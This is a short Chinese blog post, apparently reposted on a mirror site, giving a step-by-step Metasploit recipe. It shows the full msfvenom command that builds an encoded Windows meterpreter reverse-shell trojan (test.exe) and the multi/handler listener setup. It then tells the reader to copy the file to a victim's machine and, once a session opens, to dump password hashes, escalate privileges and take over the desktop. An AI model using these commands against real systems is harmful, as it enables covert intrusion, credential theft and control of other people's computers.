zoukankan      html  css  js  c++  java
  • kali之msfconsole

    1.启动msfconsole命令模式
    2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
    3.启动msfconsole命令模式 use exploit/multi/handler  使用handler这个模块,set PAYLOAD windows/meterpreter/reverse_tcp   show options如果看到没有热河参数直接下一步(set LHOST=自己的ip set LPORT=端口),
      然后
     使用这个shellcode 然后show options 看到提示 LHOST LPORT 这里填生成木马的自己的ip和端口 set LHOST 自己的ip 回车 然后set LPORT 端口
    4.exploit 回车 然后等待目标点击test.ext文件上线




    1.执行以下命令:

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
    2.将test.exe复制到受害者主机上
    3.在Kali中输入msfconsole,并按照下图进行配置:
    4.执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈
       session
    得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。



  • 相关阅读:
    hdu 1042 N!
    hdu 1002 A + B Problem II
    c++大数模板
    hdu 1004 Let the Balloon Rise
    hdu 4027 Can you answer these queries?
    poj 2823 Sliding Window
    hdu 3074 Multiply game
    hdu 1394 Minimum Inversion Number
    hdu 5199 Gunner
    九度oj 1521 二叉树的镜像
  • 原文地址:https://www.cnblogs.com/sugarxt/p/10557658.html
Copyright © 2011-2022 走看看